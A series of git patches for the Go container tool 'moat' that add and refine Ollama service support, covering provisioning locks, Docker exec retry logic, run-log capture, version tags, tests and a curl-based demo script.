accepts connections with the generated credentials. @@ -243,7 +244,7 @@ Service dependencies are designed for development and testing. They are not inte - **Ephemeral** — All data is destroyed when the run ends. Nothing persists between runs. - **Isolated** — Service containers are on a private Docker network. No ports are exposed to the host. -- **Authenticated** — Every service requires a password, even on the isolated network. Passwords are 32-character alphanumeric strings generated from `crypto/rand` and unique per run. +- **Authenticated** — Services that support authentication receive a randomly generated password per run. Passwords are 32-character alphanumeric strings from `crypto/rand`. Services without auth (e.g., Ollama) rely on network isolation. - **Scoped** — Credentials exist only in run metadata and are cleared on cleanup. ## Troubleshooting diff --git a/internal/run/services.go b/internal/run/services.go index 145cc1e5..41a88646 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -289,8 +289,7 @@ func provisionService(ctx context.Context, mgr container.ServiceManager, info co // provisionItem runs a single provision command with its own timeout and lock scope. // The lock is shared across parallel moat runs — concurrent runs pulling different -// models will still serialize on this single lock file. See todo/005 for narrowing -// to per-model locks. +// models will still serialize on this single lock file. func provisionItem(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cmd string, lockFile *os.File, stdout io.Writer) error { cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) defer cancel() From 1610aed155b5fdd2a63aa90f6ca2e55a42595681 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:21:20 +0000 Subject: [PATCH 14/27] fix: address round 3 claude-review feedback on PR #238 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Error on wait: false with provisioned items (models can't be pulled until service is ready — silent failure before this fix) - Add MOAT_OLLAMA_HOST and MOAT_OLLAMA_PORT to reference docs - Remove head -c truncation from demo.sh (was breaking JSON output) --- docs/content/reference/02-moat-yaml.md | 2 ++ examples/service-ollama/demo.sh | 6 ++---- internal/run/manager.go | 14 ++++++++++++++ 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index ecf91810..7eef34a5 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -930,6 +930,8 @@ Moat injects `MOAT_*` environment variables into the main container for each ser | Variable | Description | Example | |----------|-------------|---------| +| `MOAT_OLLAMA_HOST` | Service hostname | `ollama` | +| `MOAT_OLLAMA_PORT` | Service port | `11434` | | `MOAT_OLLAMA_URL` | Base URL for the Ollama API | `http://ollama:11434` | --- diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 5060475f..f15d2b88 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -6,12 +6,10 @@ echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" echo echo "--- Available models ---" -curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200 -echo +curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | head -c 500 + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' echo diff --git a/internal/run/manager.go b/internal/run/manager.go index 5a9df1ae..893c3f81 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1944,6 +1944,20 @@ region = %s } } if !wait { + // Reject wait: false when provisions are declared — models can't + // be pulled until the service is ready. + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s: wait: false is incompatible with provisioning — "+ + "items cannot be pulled until the service is ready\n\n"+ + "Either remove wait: false or remove the provisioned items", + dep.Name) + } continue } From 4d9ee91d85f6256e5b96f78b2e65ca91d6e325fb Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:58:21 +0000 Subject: [PATCH 15/27] fix(services): address low-priority review findings - Context-aware flock: wrap syscall.Flock in a goroutine with select on ctx.Done() so provision lock acquisition respects context cancellation - Provision output to run logs: create RunStore before service provisioning and tee output to both stderr and the run's logs.jsonl via io.MultiWriter - Docker exec inspect race: retry ContainerExecInspect up to 3 times with 100ms backoff when the exec is still marked running after stream EOF - Add test validating wait:false + provisions preconditions --- internal/container/docker_service.go | 45 +++++++++++++++++----- internal/run/manager.go | 57 +++++++++++++++++++--------- internal/run/services.go | 23 ++++++++++- internal/run/services_test.go | 25 ++++++++++++ 4 files changed, 121 insertions(+), 29 deletions(-) diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index 9e3516d9..49032e09 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -5,6 +5,7 @@ import ( "fmt" "io" "sort" + "time" dockercontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" @@ -66,12 +67,24 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) _, _ = io.Copy(io.Discard, resp.Reader) resp.Close() - execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) - if err != nil { - return fmt.Errorf("inspecting readiness check: %w", err) + // Docker may not commit the exit code immediately after the stream closes. + // Retry briefly to avoid a false "running" state from ContainerExecInspect. + var exitCode int + for attempt := 0; attempt < 3; attempt++ { + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting readiness check: %w", err) + } + if !execInspect.Running { + exitCode = execInspect.ExitCode + break + } + if attempt < 2 { + time.Sleep(100 * time.Millisecond) + } } - if execInspect.ExitCode != 0 { - return fmt.Errorf("readiness check failed with exit code %d", execInspect.ExitCode) + if exitCode != 0 { + return fmt.Errorf("readiness check failed with exit code %d", exitCode) } return nil @@ -101,12 +114,24 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) resp.Close() - execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) - if err != nil { - return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + // Docker may not commit the exit code immediately after the stream closes. + // Retry briefly to avoid a false "running" state from ContainerExecInspect. + var exitCode int + for attempt := 0; attempt < 3; attempt++ { + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if !execInspect.Running { + exitCode = execInspect.ExitCode + break + } + if attempt < 2 { + time.Sleep(100 * time.Millisecond) + } } - if execInspect.ExitCode != 0 { - return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + if exitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, exitCode) } } return nil diff --git a/internal/run/manager.go b/internal/run/manager.go index 893c3f81..860bde9a 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1935,6 +1935,21 @@ region = %s r.ServiceContainers[dep.Name] = info.ID } + // Create run storage early so provision output can be captured in logs. + // NewRunStore is idempotent (uses MkdirAll), so it's safe to call now + // even though the main container hasn't been created yet. + store, err := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) + if err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating run storage: %w", err) + } + r.Store = store + // Wait for readiness for i, dep := range serviceDeps { wait := true @@ -1979,7 +1994,12 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) - if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + provOut := io.Writer(os.Stderr) + if lw, lwErr := store.LogWriter(); lwErr == nil { + provOut = io.MultiWriter(os.Stderr, lw) + defer lw.Close() + } + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], provOut); err != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) @@ -2158,30 +2178,33 @@ region = %s } } - // Create run storage - store, err := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) - if err != nil { - // Clean up container and proxy if storage creation fails - if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { - log.Debug("failed to remove container during cleanup", "error", rmErr) + // Ensure run storage exists (may have been created early for service provisioning, + // or needs to be created now for runs without services). + if r.Store == nil { + runStore, storeErr := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) + if storeErr != nil { + // Clean up container and proxy if storage creation fails + if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { + log.Debug("failed to remove container during cleanup", "error", rmErr) + } + cleanupDaemonRun() + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating run storage: %w", storeErr) } - cleanupDaemonRun() - cleanupAgentConfig(claudeConfig) - cleanupAgentConfig(codexConfig) - cleanupAgentConfig(geminiConfig) - return nil, fmt.Errorf("creating run storage: %w", err) + r.Store = runStore } - r.Store = store // Save the generated Dockerfile to the run directory for debugging/inspection if generatedDockerfile != "" { - if saveErr := store.SaveDockerfile(generatedDockerfile); saveErr != nil { + if saveErr := r.Store.SaveDockerfile(generatedDockerfile); saveErr != nil { log.Debug("failed to save Dockerfile to run directory", "error", saveErr) } } // Open audit store for tamper-proof logging - auditStore, err := audit.OpenStore(filepath.Join(store.Dir(), "audit.db")) + auditStore, err := audit.OpenStore(filepath.Join(r.Store.Dir(), "audit.db")) if err != nil { // Clean up container, proxy, and storage if audit store fails if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { @@ -2213,7 +2236,7 @@ region = %s // Initialize snapshot engine if not disabled if opts.Config != nil && !opts.Config.Snapshots.Disabled { - snapshotDir := filepath.Join(store.Dir(), "snapshots") + snapshotDir := filepath.Join(r.Store.Dir(), "snapshots") snapEngine, snapErr := snapshot.NewEngine(opts.Workspace, snapshotDir, snapshot.EngineOptions{ UseGitignore: !opts.Config.Snapshots.Exclude.IgnoreGitignore, Additional: opts.Config.Snapshots.Exclude.Additional, @@ -2233,7 +2256,7 @@ region = %s // Log resolved secrets (best-effort; non-fatal if it fails) for _, secret := range resolvedSecrets { - _ = store.WriteSecretResolution(storage.SecretResolution{ + _ = r.Store.WriteSecretResolution(storage.SecretResolution{ Timestamp: time.Now().UTC(), Name: secret.name, Backend: secret.scheme, diff --git a/internal/run/services.go b/internal/run/services.go index 41a88646..3d95f001 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -296,8 +296,8 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta // Acquire/release lock per-item to avoid holding it across the full batch. if lockFile != nil { - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - return fmt.Errorf("acquiring cache lock: %w", err) + if err := flockContext(cmdCtx, lockFile); err != nil { + return err } defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } @@ -305,6 +305,25 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta return mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) } +// flockContext acquires an exclusive flock, but respects context cancellation. +// syscall.Flock blocks indefinitely; this wraps it in a goroutine so the caller +// can bail out when the context expires. +func flockContext(ctx context.Context, f *os.File) error { + done := make(chan error, 1) + go func() { + done <- syscall.Flock(int(f.Fd()), syscall.LOCK_EX) + }() + select { + case err := <-done: + if err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) + } + return nil + case <-ctx.Done(): + return fmt.Errorf("acquiring cache lock: %w", ctx.Err()) + } +} + // waitForServiceReady polls CheckReady until success or timeout. func waitForServiceReady(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo) error { ctx, cancel := context.WithTimeout(ctx, readinessTimeout) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index af01b53c..19e913e9 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -292,6 +292,31 @@ func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { assert.Equal(t, validModels, cfg.Provisions) } +func TestBuildServiceConfigOllamaProvisionsIncompatibleWithWaitFalse(t *testing.T) { + // Validates the fields the manager's wait:false guard checks. + // The guard rejects ProvisionCmd != "" && len(Provisions) > 0 when wait: false. + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-test", userSpec) + require.NoError(t, err) + + // These are the exact conditions the wait:false guard checks + assert.NotEmpty(t, cfg.ProvisionCmd, "ProvisionCmd must be set for guard to trigger") + assert.NotEmpty(t, cfg.Provisions, "Provisions must be set for guard to trigger") + + // Without provisions, the guard should not trigger + cfgNoProv, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + assert.NotEmpty(t, cfgNoProv.ProvisionCmd, "ProvisionCmd is set even without user models") + assert.Empty(t, cfgNoProv.Provisions, "No provisions when user doesn't specify models") +} + func TestBuildProvisionCmds(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) From d1533dd7b23b10453d9b61215815bac4bb314a8e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:23:46 +0000 Subject: [PATCH 16/27] fix(container): return error when Docker exec still running after inspect retries MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Both CheckReady and ProvisionService had a bug where if ContainerExecInspect reported the exec as still Running after all 3 retry attempts, the loop would exit without setting the complete flag, exitCode would stay 0, and the function would return nil — a false success. For ProvisionService this meant ollama pull could be silently treated as complete while the pull was still in progress. --- internal/container/docker_service.go | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index 49032e09..c926dd62 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -70,6 +70,7 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) // Docker may not commit the exit code immediately after the stream closes. // Retry briefly to avoid a false "running" state from ContainerExecInspect. var exitCode int + complete := false for attempt := 0; attempt < 3; attempt++ { execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) if err != nil { @@ -77,12 +78,16 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) } if !execInspect.Running { exitCode = execInspect.ExitCode + complete = true break } if attempt < 2 { time.Sleep(100 * time.Millisecond) } } + if !complete { + return fmt.Errorf("readiness check exec still running after retries") + } if exitCode != 0 { return fmt.Errorf("readiness check failed with exit code %d", exitCode) } @@ -117,6 +122,7 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic // Docker may not commit the exit code immediately after the stream closes. // Retry briefly to avoid a false "running" state from ContainerExecInspect. var exitCode int + complete := false for attempt := 0; attempt < 3; attempt++ { execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) if err != nil { @@ -124,12 +130,16 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic } if !execInspect.Running { exitCode = execInspect.ExitCode + complete = true break } if attempt < 2 { time.Sleep(100 * time.Millisecond) } } + if !complete { + return fmt.Errorf("provision command %q exec still running after retries", cmd) + } if exitCode != 0 { return fmt.Errorf("provision command %q failed with exit code %d", cmd, exitCode) } From 3f50f1fcb1ed40fd98d68ed0ec098d9b2f6b56e7 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:26:27 +0000 Subject: [PATCH 17/27] docs(run): clarify flockContext goroutine lifetime after context cancellation --- internal/run/services.go | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/internal/run/services.go b/internal/run/services.go index 3d95f001..b268dc13 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -308,6 +308,11 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta // flockContext acquires an exclusive flock, but respects context cancellation. // syscall.Flock blocks indefinitely; this wraps it in a goroutine so the caller // can bail out when the context expires. +// +// When context cancellation wins the select, the goroutine remains blocked on +// Flock until either the lock becomes available or the file descriptor is closed. +// The caller's deferred lockFile.Close() handles the latter — so the goroutine +// always terminates promptly. The buffered channel ensures it never blocks on send. func flockContext(ctx context.Context, f *os.File) error { done := make(chan error, 1) go func() { From 80ad0c481a3f25c24765c1041e82f463a7e3834b Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:29:08 +0000 Subject: [PATCH 18/27] fix(run): close log writer per provision iteration, not at function exit Using defer lw.Close() inside a loop defers all closes until the outer function returns. Wrap the provision block in an IIFE so defer fires immediately after provisionService returns for each service. Also extract the response field from demo.sh JSON output. --- examples/service-ollama/demo.sh | 3 ++- internal/run/manager.go | 18 ++++++++++++------ 2 files changed, 14 insertions(+), 7 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index f15d2b88..6adca851 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -11,5 +11,6 @@ echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ + | python3 -c "import sys,json; print(json.load(sys.stdin)['response'])" echo diff --git a/internal/run/manager.go b/internal/run/manager.go index 860bde9a..0aa16b1d 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1994,12 +1994,18 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) - provOut := io.Writer(os.Stderr) - if lw, lwErr := store.LogWriter(); lwErr == nil { - provOut = io.MultiWriter(os.Stderr, lw) - defer lw.Close() - } - if err := provisionService(ctx, svcMgr, info, svcConfigs[i], provOut); err != nil { + // IIFE so defer lw.Close() fires after provisionService, not at function exit. + // Without this, multiple provision-capable services would accumulate deferred + // closes until the outer function returns. + provErr := func() error { + provOut := io.Writer(os.Stderr) + if lw, lwErr := store.LogWriter(); lwErr == nil { + defer lw.Close() + provOut = io.MultiWriter(os.Stderr, lw) + } + return provisionService(ctx, svcMgr, info, svcConfigs[i], provOut) + }() + if err := provErr; err != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) From 60a03dbef3be9c8c0df80392e180d48890558031 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:56:36 +0000 Subject: [PATCH 19/27] fix(deps): correct Ollama version tags to match Docker Hub Ollama publishes full semver tags (0.18.1, 0.18.0, ...), not short major.minor tags (0.9). The previous versions 0.6-0.9 do not exist on Docker Hub, causing a 404 on image pull. Update default to 0.18.1 and set versions list to recent releases. Update tests and example moat.yaml accordingly. --- examples/service-ollama/moat.yaml | 2 +- internal/container/apple_service_test.go | 2 +- internal/container/docker_service_test.go | 4 ++-- internal/deps/registry.yaml | 4 ++-- internal/run/services_test.go | 18 +++++++++--------- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index dedf37d0..6d3542a9 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -12,7 +12,7 @@ name: service-ollama dependencies: - - ollama@0.9 + - ollama@0.18.1 - curl services: diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 5d91bcb8..2149bbb9 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -118,7 +118,7 @@ func TestGetContainerIPExists(t *testing.T) { func TestAppleBuildRunArgsWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", - Version: "0.9", + Version: "0.18.1", Image: "ollama/ollama", Env: map[string]string{}, RunID: "test-run-789", diff --git a/internal/container/docker_service_test.go b/internal/container/docker_service_test.go index b5eb478e..c6ad69c9 100644 --- a/internal/container/docker_service_test.go +++ b/internal/container/docker_service_test.go @@ -46,7 +46,7 @@ func TestBuildSidecarConfigRedis(t *testing.T) { func TestBuildSidecarConfigWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", - Version: "0.9", + Version: "0.18.1", Image: "ollama/ollama", Ports: map[string]int{"default": 11434}, Env: map[string]string{}, @@ -56,7 +56,7 @@ func TestBuildSidecarConfigWithCachePath(t *testing.T) { } sidecarCfg := buildSidecarConfig(cfg, "net-789") - assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "ollama/ollama:0.18.1", sidecarCfg.Image) assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) require.Len(t, sidecarCfg.Mounts, 1) diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index dd508321..58a7f173 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -492,8 +492,8 @@ redis: ollama: description: Ollama local model server type: service - default: "0.9" - versions: ["0.6", "0.7", "0.8", "0.9"] + default: "0.18.1" + versions: ["0.16.3", "0.17.7", "0.18.0", "0.18.1"] service: image: "ollama/ollama" ports: diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 19e913e9..d0870e7c 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -145,7 +145,7 @@ func TestBuildServiceConfigUnknown(t *testing.T) { } func TestBuildServiceConfigOllama(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -157,7 +157,7 @@ func TestBuildServiceConfigOllama(t *testing.T) { require.NoError(t, err) assert.Equal(t, "ollama", cfg.Name) - assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "0.18.1", cfg.Version) assert.Equal(t, "ollama/ollama", cfg.Image) assert.Equal(t, 11434, cfg.Ports["default"]) assert.Equal(t, "/root/.ollama", cfg.CachePath) @@ -170,7 +170,7 @@ func TestBuildServiceConfigOllama(t *testing.T) { } func TestBuildServiceConfigOllamaNoModels(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} cfg, err := buildServiceConfig(dep, "run-ollama", nil) require.NoError(t, err) @@ -180,7 +180,7 @@ func TestBuildServiceConfigOllamaNoModels(t *testing.T) { } func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} cfg, err := buildServiceConfig(dep, "run-test", nil) require.NoError(t, err) @@ -199,7 +199,7 @@ func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { } func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -213,7 +213,7 @@ func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { } func TestBuildServiceConfigRejectsScalarProvisions(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -242,7 +242,7 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { } func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} tests := []struct { name string @@ -271,7 +271,7 @@ func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { } func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} validModels := []string{ "qwen2.5-coder:7b", @@ -295,7 +295,7 @@ func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { func TestBuildServiceConfigOllamaProvisionsIncompatibleWithWaitFalse(t *testing.T) { // Validates the fields the manager's wait:false guard checks. // The guard rejects ProvisionCmd != "" && len(Provisions) > 0 when wait: false. - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ From 3da983cf1dbacfd0d0f109dde92f342509899523 Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 21:58:58 +0000 Subject: [PATCH 20/27] fix(examples): use jq instead of python3 in Ollama demo python3 is not available in debian:bookworm-slim (the base image when no Python runtime is declared). Use jq -r .response instead, which is available as an apt dependency. --- examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 6adca851..fd4c3fe4 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,5 +12,5 @@ echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | python3 -c "import sys,json; print(json.load(sys.stdin)['response'])" + | jq -r .response echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index 6d3542a9..8ffde955 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -14,6 +14,7 @@ name: service-ollama dependencies: - ollama@0.18.1 - curl + - jq services: ollama: From a716d17fb770d7b7aec69bbacf3b8aec3697d933 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:05:00 +0000 Subject: [PATCH 21/27] feat(run): print status messages while waiting for services and pulling models --- internal/run/manager.go | 3 +++ 1 file changed, 3 insertions(+) diff --git a/internal/run/manager.go b/internal/run/manager.go index 0aa16b1d..8454d7fb 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1977,6 +1977,7 @@ region = %s } info := serviceInfos[i] + fmt.Fprintf(os.Stderr, "Waiting for %s to be ready...\n", dep.Name) log.Debug("waiting for service to be ready", "service", dep.Name) if err := waitForServiceReady(ctx, svcMgr, info); err != nil { cleanupServices() @@ -1993,6 +1994,8 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + fmt.Fprintf(os.Stderr, "Pulling %d item(s) for %s: %s\n", + len(svcConfigs[i].Provisions), dep.Name, strings.Join(svcConfigs[i].Provisions, ", ")) log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) // IIFE so defer lw.Close() fires after provisionService, not at function exit. // Without this, multiple provision-capable services would accumulate deferred From 76605a8cf2ed01c411a970ee60c2f84f4f88c5aa Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:14:58 +0000 Subject: [PATCH 22/27] fix(examples): add Content-Type header and surface errors in ollama demo --- examples/service-ollama/demo.sh | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index fd4c3fe4..5dfbbfb8 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -10,7 +10,8 @@ curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" -curl -s "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | jq -r .response +result=$(curl -s -H 'Content-Type: application/json' \ + "$MOAT_OLLAMA_URL/api/generate" \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}') +echo "$result" | jq -r '.response // (.error | "Error: " + .)' echo From 8363fd533eec87bcf8811d52bee80c9071bb57b6 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:17:10 +0000 Subject: [PATCH 23/27] fix(examples): use qwen2.5-coder:0.5b to fit in constrained environments --- examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 5dfbbfb8..0bd1cc32 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,6 +12,6 @@ echo echo "--- Generating response ---" result=$(curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}') + -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}') echo 